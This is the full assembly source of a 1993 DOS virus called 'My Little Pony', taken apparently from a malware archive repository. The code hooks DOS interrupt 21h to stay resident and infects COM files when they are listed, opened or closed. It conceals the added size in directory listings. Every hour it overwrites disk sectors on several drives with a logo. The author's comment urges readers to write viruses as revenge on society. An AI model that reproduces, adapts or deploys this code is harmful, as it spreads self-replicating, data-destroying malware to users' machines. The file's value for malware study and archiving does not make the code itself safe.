MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mlp-1307.asm

749 lines
22 KiB
NASM
Raw Permalink Normal View History

2021-01-12 23:49:21 +00:00
.model tiny
.code
org 100h
start:
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
; A NEW ORDER OF INTELLIGENCE PRESENTS: ;
; My Little Pony 1.00 ;
; Copyright (c) 1992, 1993 by Cruel Entity / Macaroni Ted ;
; - A.N.O.I - ;
; ;
; ;
; I know that there is a much better documented source-code for this ;
; virus. And I'm also very interessted to get in touch with the guy ;
; who did that documentation. Please contact me. ;
; ;
; You may freely use this code as you want, just give me some of the ;
; credits. Please learn to create virus, so we, together can get our ;
; revenge to the soceity. Learn to feel the feeling being cruel! ;
; ;
; Of cource I can't take any responsibility for all virus-coders ;
; who use any of the routines in this virus. ;
; ;
; ;
; Greetings to; The Unforgiven for giving me AT&T's ;
; Immortal Riot's members '94 ;
; The man sitting in basement ;
; ;
; ps! Tasm /m3 and tlink /t to get this babe into executable!
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=;
start:
call $+3
sub_this: pop bp
mov ax,0dd22h ;are we already in memory?
int 21h
cmp ax,03d33h
jne $+7
lea dx,[bp+(cancel-sub_this)]
jmp far ptr dx
mov ax,3521h ;get int 21h vect
int 21h
mov [bp+(int_21h_off-sub_this)],bx
mov [bp+(int_21h_seg-sub_this)],es
mov ax,cs
dec ax
mov es,ax
mov ax,es:[0003h]
sub ax,[bp+(memlen-sub_this)]
mov es:[0003h],ax
mov ax,[bp+(memlen-sub_this)]
sub word ptr es:[0012h],ax
mov es,es:[0012h]
push es
lea si,[bp+(start-sub_this)]
mov di,0100h
mov cx,[bp+(filelen-sub_this)]
rep movsb
pop ds ;es => ds
mov ax,2521h ;new vector at ES:0100
lea dx,new_int_21h
int 21h
cancel:
push cs ;cs => ds => es
push cs
pop ds
pop es
lea si,[bp+(first_bytes-sub_this)]
mov cx,3
mov di,100h
rep movsb
sub di,3
jmp far ptr di
db 'Simple Simon met a pieman going to the fair said'
db ' Simple Simon to the pieman let me take your ware'
write_rnd_sector:
cmp dh,0 ;sec
jne back
cmp dl,5 ;100th
ja back
pushf ;fuck rnd sector
push bx
call get_rnd
mov cx,10 ;/ 10
xor dx,dx
div cx
mov dx,ax ;dx=ax
mov al,2h ; Drive #, start with C:
mov cx,1h ; # of sectors to overwrite
lea bx,logo ; Address to overwriting DATA
loopie:
int 26h
popf
inc al
cmp al,25
jne loopie
pop bx
popf
jmp back
db '(c)1993 Cruel Entity'
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
; New int 21h
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
new_int_21h:
pushf
cmp ax,0dd22h ;check if resident
je mem_check
cmp ah,11h ;find 1st old
je find_old
cmp ah,12h ;find 1st old
je find_old
cmp ah,4eh ;dos 2.x
je find_
cmp ah,4fh
je find_
cmp ah,3dh ;open
je open_
cmp ah,3eh ;close
je close_
cmp ah,2ch
je back2
push ax
push cx
push dx
mov ah,2ch
int 21h
cmp cl,00 ;a new hour?
je write_rnd_sector
back:
pop dx
pop cx
pop ax
back2:
cmp ah,36h
jne return_21h
push bp
lea bp,get_free_space
jmp far ptr bp
return_21h:
popf
real_int_21h: db 0eah ;jmp...
int_21h_off dw ? ;to old int 21h
int_21h_seg dw ?
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
find_:
push bp
lea bp,find_new
jmp far ptr bp
open_:
push bp
lea bp,open
jmp far ptr bp
close_:
push bp
lea bp,close_file
jmp far ptr bp
mem_check:
popf
mov ax,3d33h
iret
call_int21h:
jmp dword ptr cs:int_21h_off ;force a call to DOS
ret
find_old:
popf
pushf ;find fcb
push cs
call call_int21h
cmp al,0ffh
je no_more_files
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh ;get dta
int 21h
push es ;es:bx
pop ds ;ds:bx
mov si,bx ;ds:si
add si,16 ;ext name
lodsw
cmp ax,'OC' ;.CO
jne cancel_ff
lodsb
cmp al,'M' ;M
jne cancel_ff
ext_ok:
;ext=com
mov si,bx ;check size
add si,26h
lodsw
cmp ax,0 ;=> 0ffffh?
jne cancel_ff
mov si,bx ;check if already infected
add si,30
lodsw ;time
and al,00011111b
cmp al,00001010b
je $+7 ;already infected (sec=24)
lea dx,store_in_mem
jmp far ptr dx
mov si,bx ;alter size
add si,36
mov di,si
lodsw
sub ax,cs:filelen
jz cancel_ff
stosw
cancel_ff:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files: retf 2 ;iret flags
db "%%% MY LITTLE PONY %%% COPYRIGHT(C) 1993 A.N.O.I. %%%"
store_in_mem: ;store filename in buffer
mov si,bx
add si,8
push cs ;cs => es
pop es
mov cx,10
lea di,file_buffer ;check pos
check_pos:
cmp byte ptr es:[di],20h
je store
add di,8
loop check_pos
jmp cancel_ff
store:
mov cx,8
rep movsb
jmp cancel_ff
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
get_free_space:
pop bp
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
push cs ;cs=> ds=> es
push cs
pop ds
pop es
lea di,file_buffer
mov cx,10
check_last:
cmp byte ptr [di],20h ;check if last
je cancel_inf
push di
push cx
mov si,di ;si=file pos
call infect
pop cx
pop di
add di,8
loop check_last
cancel_inf:
push cs
pop es
lea di,file_buffer
mov cx,80+12
mov al,20h
rep stosb
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp real_int_21h
infect:
;convert filename to asciiz
lea di,filename
mov cx,8 ;filename NOT ext
cpy_filename:
lodsb
cmp al,20h
je filename_klar
stosb
loop cpy_filename
filename_klar:
mov al,'.'
stosb
mov al,'C'
stosb
mov al,'O'
stosb
mov al,'M'
stosb
mov al,0
stosb
push cs
pop ds
mov ax,4300h ;get attrib
lea dx,filename
int 21h
jnc $+3 ;error?
ret
push cx ;save attrib
xor cx,cx
mov ax,4301h ;force all attribs
int 21h
mov ax,3d02h ;open filename
lea dx,filename
pushf
push cs
call call_int21h
mov bx,ax ;save handle
mov ax,5700h ;get time/date
int 21h
push dx ;save time/date
push cx
and cl,00011111b
cmp cl,00001010b
jne $+7 ;already infected (sec=24)
lea dx,cancel_inf2
jmp far ptr dx
mov ah,3fh ;read 3 first bytes
mov cx,3
lea dx,first_bytes
int 21h
mov ax,4202h ;goto eof
xor dx,dx
xor cx,cx
int 21h
sub ax,3 ;create a jmp
mov jmp_2,ax
mov ah,40h ;write virus
mov dx,100h
mov cx,filelen
int 21h
mov ax,4200h ;goto beg
xor dx,dx
xor cx,cx
int 21h
mov ah,40h ;write jmp
mov cx,3
lea dx,jmp_1
int 21h
cancel_inf2:
pop cx ;restore time/date
pop dx
and cl,11100000b ;secs=20
or cl,00001010b
mov ax,5701h ;set time/date
int 21h
mov ah,3eh ;close
pushf
push cs
call call_int21h
mov ax,4301h ;set attrib
lea dx,filename
pop cx ;restore attrib
int 21h
ret
find_new:
pop bp
popf
pushf ;find 4e
push cs
call call_int21h
jnc more_files
retf 2
more_files:
pushf
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push bp
mov ah,2fh ;get dta
int 21h
push es ;es:bx
pop ds ;ds:bx
mov si,bx ;ds:si
push cs ;cs => es
pop es
add si,1eh ;f name
lea di,filename
mov cx,25
get_fname:
lodsb
cmp al,0
je get_f_klar
stosb
loop get_fname
get_f_klar:
mov al,0 ;asciiz
stosb
push ds ;ds=> es
pop es
push cs ;cs=> ds
pop ds
mov si,di
sub si,4 ;'COM'
lodsw ;CO
cmp ax,'OC'
je check_m
cmp ax,'oc'
jne cancel_new
check_m:
lodsb
cmp al,'m'
je ext_is_com
cmp al,'M'
jne cancel_new
ext_is_com:
push es ;es=> ds
pop ds
mov si,bx
add si,1ch ;check size
lodsw
cmp ax,0 ;=> 0ffffh
jne cancel_new
mov si,bx
add si,16h
lodsw ;time
and al,00011111b
cmp al,00001010b
jne cancel_new ;not infected
mov si,bx
add si,1ah
mov di,si
lodsw ;alter size
sub ax,cs:filelen
jz cancel_new
stosw
cancel_new:
pop bp
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
no_more_files2: retf 2 ;iret flags
open:
pop bp
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov al,'.'
push ds ;ds=> es
pop es
mov di,dx ;es:di filename
mov cx,50
repnz scasb
mov si,di ;ds:si file ext.
lodsw
cmp ax,'OC'
je check_m2
cmp ax,'oc'
je $+7
lea dx,cancel_open
jmp far ptr dx
check_m2:
lodsb
cmp al,'m'
je ext_is_com2
cmp al,'M'
jne cancel_open
ext_is_com2:
mov ax,3d02h ;open file
pushf
push cs
call call_int21h
jc cancel_open
mov bx,ax
push cs
pop ds
push cs
pop es
mov ax,5700h ;get time/date
int 21h
and cl,00011111b ;already infected
cmp cl,00001010b
jne cancel_open
mov ax,4202h ;goto eof
xor dx,dx
xor cx,cx
int 21h
push ax ;save size
sub ax,3
mov dx,ax ;goto eof -3
mov ax,4200h
mov cx,0
int 21h
mov ah,3fh ;read
mov cx,3
lea dx,temp_bytes
int 21h
mov ax,4200h ;goto beg
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write original
mov cx,3
lea dx,temp_bytes
int 21h
pop dx
sub dx,filelen
mov ax,4200h ;goto real size
mov cx,0
int 21h
mov ah,40h
mov cx,0
int 21h
mov ah,3eh
pushf
push cs
call call_int21h
cancel_open:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
pushf ;open file...
push cs
call call_int21h
retf 2
close_file:
pop bp
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov ax,1220h ;get handle table
int 02Fh
mov bl,es:[di]
mov ax,1216h
int 02Fh
mov bp,di
add di,28h
push es
pop ds
mov si,di
lodsw
cmp ax,'OC'
jne cancel_open
lodsb
cmp al,'M'
jne cancel_open
mov si,bp
add si,20h
push cs
pop es
call infect
jmp cancel_open
get_rnd:
push dx
push cx
push bx
in al,40h ;'@'
add ax,0000
mov dx,0000
mov cx,0007
rnd_init5:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_init6
inc al
rnd_init6:
loop rnd_init5
pop bx
mov al,dl
pop cx
pop dx
rnd_init_ret:
ret
logo db '>>> A.N.O.I <<<' ; DATA to overwrite with
temp_bytes db 3 dup(?)
filelen dw offset eof - offset start
memlen dw 100
file_buffer db 80 dup(20h)
filename db 12 dup(?)
jmp_1 db 0e9h
jmp_2 dw ?
first_bytes db 90h,0cdh,20h
eof:
end start